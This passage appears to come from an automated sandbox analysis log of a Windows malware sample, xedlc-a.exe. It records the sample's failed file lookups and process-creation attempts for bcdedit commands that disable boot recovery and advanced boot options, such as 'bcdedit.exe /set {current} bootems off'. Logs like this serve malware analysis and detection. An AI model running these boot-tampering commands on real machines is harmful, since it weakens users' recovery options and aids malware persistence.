42553.         file:
42554.           timestamp: 50161
42555.           mode: failed
42556.           sequenceNumber: 290
42557.           value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
42558.           processinfo:
42559.             tainted: true
42560.             pid: 1056
42561.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42562.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42563.             ads:
42564.           fid (ads:): 0
42565.           failure: open
42566.           ntstatus: 0xc000003a
42567.           CreateOptions: 0x200000
42568.           PE:
42569.             InspectionType: Ext
42570.         file:
42571.           timestamp: 50167
42572.           mode: failed
42573.           sequenceNumber: 291
42574.           value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
42575.           processinfo:
42576.             tainted: true
42577.             pid: 1056
42578.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42579.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42580.             ads:
42581.           fid (ads:): 0
42582.           failure: open
42583.           ntstatus: 0xc000003a
42584.           CreateOptions: 0x200000
42585.           PE:
42586.             InspectionType: Ext
42587.         file:
42588.           timestamp: 50173
42589.           mode: failed
42590.           sequenceNumber: 292
42591.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} bootems off.exe
42592.           processinfo:
42593.             tainted: true
42594.             pid: 1056
42595.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42596.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42597.             ads:
42598.           fid (ads:): 0
42599.           failure: open
42600.           ntstatus: 0xc000003a
42601.           CreateOptions: 0x200000
42602.           PE:
42603.             InspectionType: Ext
42604.         file:
42605.           timestamp: 50178
42606.           mode: failed
42607.           sequenceNumber: 293
42608.           value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
42609.           processinfo:
42610.             tainted: true
42611.             pid: 1056
42612.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42613.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42614.             ads:
42615.           fid (ads:): 0
42616.           failure: open
42617.           ntstatus: 0xc000003a
42618.           CreateOptions: 0x200000
42619.           PE:
42620.             InspectionType: Ext
42621.         file:
42622.           timestamp: 50183
42623.           mode: failed
42624.           sequenceNumber: 294
42625.           value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
42626.           processinfo:
42627.             tainted: true
42628.             pid: 1056
42629.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42630.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42631.             ads:
42632.           fid (ads:): 0
42633.           failure: open
42634.           ntstatus: 0xc000003a
42635.           CreateOptions: 0x200000
42636.           PE:
42637.             InspectionType: Ext
42638.         file:
42639.           timestamp: 50189
42640.           mode: failed
42641.           sequenceNumber: 295
42642.           value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
42643.           processinfo:
42644.             tainted: true
42645.             pid: 1056
42646.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42647.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42648.             ads:
42649.           fid (ads:): 0
42650.           failure: open
42651.           ntstatus: 0xc000003a
42652.           CreateOptions: 0x200000
42653.           PE:
42654.             InspectionType: Ext
42655.         file:
42656.           timestamp: 50195
42657.           mode: failed
42658.           sequenceNumber: 296
42659.           value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
42660.           processinfo:
42661.             tainted: true
42662.             pid: 1056
42663.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42664.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42665.             ads:
42666.           fid (ads:): 0
42667.           failure: open
42668.           ntstatus: 0xc000003a
42669.           CreateOptions: 0x200000
42670.           PE:
42671.             InspectionType: Ext
42672.         file:
42673.           timestamp: 50201
42674.           mode: failed
42675.           sequenceNumber: 297
42676.           value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
42677.           processinfo:
42678.             tainted: true
42679.             pid: 1056
42680.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42681.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42682.             ads:
42683.           fid (ads:): 0
42684.           failure: open
42685.           ntstatus: 0xc000003a
42686.           CreateOptions: 0x200000
42687.           PE:
42688.             InspectionType: Ext
42689.         apicall:
42690.           timestamp: 50205
42691.           sequenceNumber: 298
42692.           processinfo:
42693.             pid: 1056
42694.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42695.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42696.           dllname: dummy.dll
42697.           apiname: ProcessCreate_Failure
42698.           address: 0x7c81d627
42699.           params:
42700.             param (id:1): NULL
42701.             param (id:2): bcdedit.exe /set {current} bootems off
42702.             param (id:3): 32
42703.             param (id:4): NULL
42704.         apicall:
42705.           timestamp: 50210
42706.           sequenceNumber: 299
42707.           processinfo:
42708.             pid: 1056
42709.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42710.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42711.           dllname: kernel32.dll
42712.           apiname: Sleep
42713.           address: 0x0041dca8
42714.           params:
42715.             param (id:1): 1000
42716.         file:
42717.           timestamp: 50215
42718.           mode: failed
42719.           sequenceNumber: 300
42720.           value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
42721.           processinfo:
42722.             tainted: true
42723.             pid: 1056
42724.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42725.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42726.             ads:
42727.           fid (ads:): 0
42728.           failure: open
42729.           ntstatus: 0xc000003a
42730.           CreateOptions: 0x200000
42731.           PE:
42732.             InspectionType: Ext
42733.         file:
42734.           timestamp: 50221
42735.           mode: failed
42736.           sequenceNumber: 301
42737.           value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
42738.           processinfo:
42739.             tainted: true
42740.             pid: 1056
42741.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42742.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42743.             ads:
42744.           fid (ads:): 0
42745.           failure: open
42746.           ntstatus: 0xc000003a
42747.           CreateOptions: 0x200000
42748.           PE:
42749.             InspectionType: Ext
42750.         file:
42751.           timestamp: 51222
42752.           mode: failed
42753.           sequenceNumber: 302
42754.           value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
42755.           processinfo:
42756.             tainted: true
42757.             pid: 1056
42758.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42759.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42760.             ads:
42761.           fid (ads:): 0
42762.           failure: open
42763.           ntstatus: 0xc000003a
42764.           CreateOptions: 0x200000
42765.           PE:
42766.             InspectionType: Ext
42767.         file:
42768.           timestamp: 51227
42769.           mode: failed
42770.           sequenceNumber: 303
42771.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} advancedoptions.exe
42772.           processinfo:
42773.             tainted: true
42774.             pid: 1056
42775.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42776.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42777.             ads:
42778.           fid (ads:): 0
42779.           failure: open
42780.           ntstatus: 0xc000003a
42781.           CreateOptions: 0x200000
42782.           PE:
42783.             InspectionType: Ext
42784.         file:
42785.           timestamp: 51233
42786.           mode: failed
42787.           sequenceNumber: 304
42788.           value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
42789.           processinfo:
42790.             tainted: true
42791.             pid: 1056
42792.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42793.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42794.             ads:
42795.           fid (ads:): 0
42796.           failure: open
42797.           ntstatus: 0xc000003a
42798.           CreateOptions: 0x200000
42799.           PE:
42800.             InspectionType: Ext
42801.         file:
42802.           timestamp: 51239
42803.           mode: failed
42804.           sequenceNumber: 305
42805.           value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
42806.           processinfo:
42807.             tainted: true
42808.             pid: 1056
42809.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42810.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42811.             ads:
42812.           fid (ads:): 0
42813.           failure: open
42814.           ntstatus: 0xc000003a
42815.           CreateOptions: 0x200000
42816.           PE:
42817.             InspectionType: Ext
42818.         file:
42819.           timestamp: 51244
42820.           mode: failed
42821.           sequenceNumber: 306
42822.           value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
42823.           processinfo:
42824.             tainted: true
42825.             pid: 1056
42826.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42827.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42828.             ads:
42829.           fid (ads:): 0
42830.           failure: open
42831.           ntstatus: 0xc000003a
42832.           CreateOptions: 0x200000
42833.           PE:
42834.             InspectionType: Ext
42835.         file:
42836.           timestamp: 51274
42837.           mode: failed
42838.           sequenceNumber: 307
42839.           value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
42840.           processinfo:
42841.             tainted: true
42842.             pid: 1056
42843.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42844.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42845.             ads:
42846.           fid (ads:): 0
42847.           failure: open
42848.           ntstatus: 0xc000003a
42849.           CreateOptions: 0x200000
42850.           PE:
42851.             InspectionType: Ext
42852.         file:
42853.           timestamp: 51280
42854.           mode: failed
42855.           sequenceNumber: 308
42856.           value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
42857.           processinfo:
42858.             tainted: true
42859.             pid: 1056
42860.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42861.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42862.             ads:
42863.           fid (ads:): 0
42864.           failure: open
42865.           ntstatus: 0xc000003a
42866.           CreateOptions: 0x200000
42867.           PE:
42868.             InspectionType: Ext
42869.         file:
42870.           timestamp: 51285
42871.           mode: failed
42872.           sequenceNumber: 309
42873.           value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
42874.           processinfo:
42875.             tainted: true
42876.             pid: 1056
42877.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42878.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42879.             ads:
42880.           fid (ads:): 0
42881.           failure: open
42882.           ntstatus: 0xc000003a
42883.           CreateOptions: 0x200000
42884.           PE:
42885.             InspectionType: Ext
42886.         file:
42887.           timestamp: 51291
42888.           mode: failed
42889.           sequenceNumber: 310
42890.           value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
42891.           processinfo:
42892.             tainted: true
42893.             pid: 1056
42894.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42895.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42896.             ads:
42897.           fid (ads:): 0
42898.           failure: open
42899.           ntstatus: 0xc000003a
42900.           CreateOptions: 0x200000
42901.           PE:
42902.             InspectionType: Ext
42903.         file:
42904.           timestamp: 51297
42905.           mode: failed
42906.           sequenceNumber: 311
42907.           value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
42908.           processinfo:
42909.             tainted: true
42910.             pid: 1056
42911.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42912.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42913.             ads:
42914.           fid (ads:): 0
42915.           failure: open
42916.           ntstatus: 0xc000003a
42917.           CreateOptions: 0x200000
42918.           PE:
42919.             InspectionType: Ext
42920.         file:
42921.           timestamp: 51303
42922.           mode: failed
42923.           sequenceNumber: 312
42924.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} advancedoptions off.exe
42925.           processinfo:
42926.             tainted: true
42927.             pid: 1056
42928.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42929.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42930.             ads:
42931.           fid (ads:): 0
42932.           failure: open
42933.           ntstatus: 0xc000003a
42934.           CreateOptions: 0x200000
42935.           PE:
42936.             InspectionType: Ext
42937.         file:
42938.           timestamp: 51308
42939.           mode: failed
42940.           sequenceNumber: 313
42941.           value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
42942.           processinfo:
42943.             tainted: true
42944.             pid: 1056
42945.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42946.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42947.             ads:
42948.           fid (ads:): 0
42949.           failure: open
42950.           ntstatus: 0xc000003a
42951.           CreateOptions: 0x200000
42952.           PE:
42953.             InspectionType: Ext
42954.         file:
42955.           timestamp: 51313
42956.           mode: failed
42957.           sequenceNumber: 314
42958.           value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
42959.           processinfo:
42960.             tainted: true
42961.             pid: 1056
42962.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42963.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42964.             ads:
42965.           fid (ads:): 0
42966.           failure: open
42967.           ntstatus: 0xc000003a
42968.           CreateOptions: 0x200000
42969.           PE:
42970.             InspectionType: Ext
42971.         file:
42972.           timestamp: 51319
42973.           mode: failed
42974.           sequenceNumber: 315
42975.           value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
42976.           processinfo:
42977.             tainted: true
42978.             pid: 1056
42979.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42980.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42981.             ads:
42982.           fid (ads:): 0
42983.           failure: open
42984.           ntstatus: 0xc000003a
42985.           CreateOptions: 0x200000
42986.           PE:
42987.             InspectionType: Ext
42988.         file:
42989.           timestamp: 51327
42990.           mode: failed
42991.           sequenceNumber: 316
42992.           value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
42993.           processinfo:
42994.             tainted: true
42995.             pid: 1056
42996.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
42997.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
42998.             ads:
42999.           fid (ads:): 0
43000.           failure: open
43001.           ntstatus: 0xc000003a
43002.           CreateOptions: 0x200000
43003.           PE:
43004.             InspectionType: Ext
43005.         file:
43006.           timestamp: 51332
43007.           mode: failed
43008.           sequenceNumber: 317
43009.           value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
43010.           processinfo:
43011.             tainted: true
43012.             pid: 1056
43013.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43014.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43015.             ads:
43016.           fid (ads:): 0
43017.           failure: open
43018.           ntstatus: 0xc000003a
43019.           CreateOptions: 0x200000
43020.           PE:
43021.             InspectionType: Ext
43022.         file:
43023.           timestamp: 51339
43024.           mode: failed
43025.           sequenceNumber: 318
43026.           value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
43027.           processinfo:
43028.             tainted: true
43029.             pid: 1056
43030.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43031.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43032.             ads:
43033.           fid (ads:): 0
43034.           failure: open
43035.           ntstatus: 0xc000003a
43036.           CreateOptions: 0x200000
43037.           PE:
43038.             InspectionType: Ext
43039.         file:
43040.           timestamp: 51345
43041.           mode: failed
43042.           sequenceNumber: 319
43043.           value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
43044.           processinfo:
43045.             tainted: true
43046.             pid: 1056
43047.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43048.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43049.             ads:
43050.           fid (ads:): 0
43051.           failure: open
43052.           ntstatus: 0xc000003a
43053.           CreateOptions: 0x200000
43054.           PE:
43055.             InspectionType: Ext
43056.         apicall:
43057.           timestamp: 51349
43058.           sequenceNumber: 320
43059.           processinfo:
43060.             pid: 1056
43061.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43062.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43063.           dllname: dummy.dll
43064.           apiname: ProcessCreate_Failure
43065.           address: 0x7c81d627
43066.           params:
43067.             param (id:1): NULL
43068.             param (id:2): bcdedit.exe /set {current} advancedoptions off
43069.             param (id:3): 32
43070.             param (id:4): NULL
43071.         apicall:
43072.           timestamp: 51354
43073.           sequenceNumber: 321
43074.           processinfo:
43075.             pid: 1056
43076.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43077.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43078.           dllname: kernel32.dll
43079.           apiname: Sleep
43080.           address: 0x0041dca8
43081.           params:
43082.             param (id:1): 1000
43083.         file:
43084.           timestamp: 52365
43085.           mode: failed
43086.           sequenceNumber: 322
43087.           value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
43088.           processinfo:
43089.             tainted: true
43090.             pid: 1056
43091.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43092.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43093.             ads:
43094.           fid (ads:): 0
43095.           failure: open
43096.           ntstatus: 0xc000003a
43097.           CreateOptions: 0x200000
43098.           PE:
43099.             InspectionType: Ext
43100.         file:
43101.           timestamp: 52371
43102.           mode: failed
43103.           sequenceNumber: 323
43104.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} optionsedit.exe
43105.           processinfo:
43106.             tainted: true
43107.             pid: 1056
43108.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43109.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43110.             ads:
43111.           fid (ads:): 0
43112.           failure: open
43113.           ntstatus: 0xc000003a
43114.           CreateOptions: 0x200000
43115.           PE:
43116.             InspectionType: Ext
43117.         file:
43118.           timestamp: 52377
43119.           mode: failed
43120.           sequenceNumber: 324
43121.           value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
43122.           processinfo:
43123.             tainted: true
43124.             pid: 1056
43125.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43126.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43127.             ads:
43128.           fid (ads:): 0
43129.           failure: open
43130.           ntstatus: 0xc000003a
43131.           CreateOptions: 0x200000
43132.           PE:
43133.             InspectionType: Ext
43134.         file:
43135.           timestamp: 52383
43136.           mode: failed
43137.           sequenceNumber: 325
43138.           value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
43139.           processinfo:
43140.             tainted: true
43141.             pid: 1056
43142.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43143.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43144.             ads:
43145.           fid (ads:): 0
43146.           failure: open
43147.           ntstatus: 0xc000003a
43148.           CreateOptions: 0x200000
43149.           PE:
43150.             InspectionType: Ext
43151.         file:
43152.           timestamp: 52388
43153.           mode: failed
43154.           sequenceNumber: 326
43155.           value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
43156.           processinfo:
43157.             tainted: true
43158.             pid: 1056
43159.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43160.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43161.             ads:
43162.           fid (ads:): 0
43163.           failure: open
43164.           ntstatus: 0xc000003a
43165.           CreateOptions: 0x200000
43166.           PE:
43167.             InspectionType: Ext
43168.         file:
43169.           timestamp: 52394
43170.           mode: failed
43171.           sequenceNumber: 327
43172.           value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
43173.           processinfo:
43174.             tainted: true
43175.             pid: 1056
43176.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43177.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43178.             ads:
43179.           fid (ads:): 0
43180.           failure: open
43181.           ntstatus: 0xc000003a
43182.           CreateOptions: 0x200000
43183.           PE:
43184.             InspectionType: Ext
43185.         file:
43186.           timestamp: 52399
43187.           mode: failed
43188.           sequenceNumber: 328
43189.           value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
43190.           processinfo:
43191.             tainted: true
43192.             pid: 1056
43193.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43194.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43195.             ads:
43196.           fid (ads:): 0
43197.           failure: open
43198.           ntstatus: 0xc000003a
43199.           CreateOptions: 0x200000
43200.           PE:
43201.             InspectionType: Ext
43202.         file:
43203.           timestamp: 52405
43204.           mode: failed
43205.           sequenceNumber: 329
43206.           value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
43207.           processinfo:
43208.             tainted: true
43209.             pid: 1056
43210.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43211.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43212.             ads:
43213.           fid (ads:): 0
43214.           failure: open
43215.           ntstatus: 0xc000003a
43216.           CreateOptions: 0x200000
43217.           PE:
43218.             InspectionType: Ext
43219.         file:
43220.           timestamp: 52411
43221.           mode: failed
43222.           sequenceNumber: 330
43223.           value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
43224.           processinfo:
43225.             tainted: true
43226.             pid: 1056
43227.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43228.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43229.             ads:
43230.           fid (ads:): 0
43231.           failure: open
43232.           ntstatus: 0xc000003a
43233.           CreateOptions: 0x200000
43234.           PE:
43235.             InspectionType: Ext
43236.         file:
43237.           timestamp: 52417
43238.           mode: failed
43239.           sequenceNumber: 331
43240.           value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
43241.           processinfo:
43242.             tainted: true
43243.             pid: 1056
43244.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43245.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43246.             ads:
43247.           fid (ads:): 0
43248.           failure: open
43249.           ntstatus: 0xc000003a
43250.           CreateOptions: 0x200000
43251.           PE:
43252.             InspectionType: Ext
43253.         file:
43254.           timestamp: 52423
43255.           mode: failed
43256.           sequenceNumber: 332
43257.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} optionsedit off.exe
43258.           processinfo:
43259.             tainted: true
43260.             pid: 1056
43261.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43262.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43263.             ads:
43264.           fid (ads:): 0
43265.           failure: open
43266.           ntstatus: 0xc000003a
43267.           CreateOptions: 0x200000
43268.           PE:
43269.             InspectionType: Ext
43270.         file:
43271.           timestamp: 52428
43272.           mode: failed
43273.           sequenceNumber: 333
43274.           value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
43275.           processinfo:
43276.             tainted: true
43277.             pid: 1056
43278.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43279.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43280.             ads:
43281.           fid (ads:): 0
43282.           failure: open
43283.           ntstatus: 0xc000003a
43284.           CreateOptions: 0x200000
43285.           PE:
43286.             InspectionType: Ext
43287.         file:
43288.           timestamp: 52433
43289.           mode: failed
43290.           sequenceNumber: 334
43291.           value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
43292.           processinfo:
43293.             tainted: true
43294.             pid: 1056
43295.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43296.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43297.             ads:
43298.           fid (ads:): 0
43299.           failure: open
43300.           ntstatus: 0xc000003a
43301.           CreateOptions: 0x200000
43302.           PE:
43303.             InspectionType: Ext
43304.         file:
43305.           timestamp: 52439
43306.           mode: failed
43307.           sequenceNumber: 335
43308.           value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
43309.           processinfo:
43310.             tainted: true
43311.             pid: 1056
43312.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43313.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43314.             ads:
43315.           fid (ads:): 0
43316.           failure: open
43317.           ntstatus: 0xc000003a
43318.           CreateOptions: 0x200000
43319.           PE:
43320.             InspectionType: Ext
43321.         file:
43322.           timestamp: 52446
43323.           mode: failed
43324.           sequenceNumber: 336
43325.           value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
43326.           processinfo:
43327.             tainted: true
43328.             pid: 1056
43329.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43330.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43331.             ads:
43332.           fid (ads:): 0
43333.           failure: open
43334.           ntstatus: 0xc000003a
43335.           CreateOptions: 0x200000
43336.           PE:
43337.             InspectionType: Ext
43338.         file:
43339.           timestamp: 52453
43340.           mode: failed
43341.           sequenceNumber: 337
43342.           value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
43343.           processinfo:
43344.             tainted: true
43345.             pid: 1056
43346.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43347.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43348.             ads:
43349.           fid (ads:): 0
43350.           failure: open
43351.           ntstatus: 0xc000003a
43352.           CreateOptions: 0x200000
43353.           PE:
43354.             InspectionType: Ext
43355.         file:
43356.           timestamp: 52460
43357.           mode: failed
43358.           sequenceNumber: 338
43359.           value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
43360.           processinfo:
43361.             tainted: true
43362.             pid: 1056
43363.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43364.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43365.             ads:
43366.           fid (ads:): 0
43367.           failure: open
43368.           ntstatus: 0xc000003a
43369.           CreateOptions: 0x200000
43370.           PE:
43371.             InspectionType: Ext
43372.         file:
43373.           timestamp: 52467
43374.           mode: failed
43375.           sequenceNumber: 339
43376.           value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
43377.           processinfo:
43378.             tainted: true
43379.             pid: 1056
43380.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43381.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43382.             ads:
43383.           fid (ads:): 0
43384.           failure: open
43385.           ntstatus: 0xc000003a
43386.           CreateOptions: 0x200000
43387.           PE:
43388.             InspectionType: Ext
43389.         apicall:
43390.           timestamp: 52459
43391.           sequenceNumber: 340
43392.           processinfo:
43393.             pid: 1056
43394.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43395.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43396.           dllname: dummy.dll
43397.           apiname: ProcessCreate_Failure
43398.           address: 0x7c81d627
43399.           params:
43400.             param (id:1): NULL
43401.             param (id:2): bcdedit.exe /set {current} optionsedit off
43402.             param (id:3): 32
43403.             param (id:4): NULL
43404.         apicall:
43405.           timestamp: 52459
43406.           sequenceNumber: 341
43407.           processinfo:
43408.             pid: 1056
43409.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
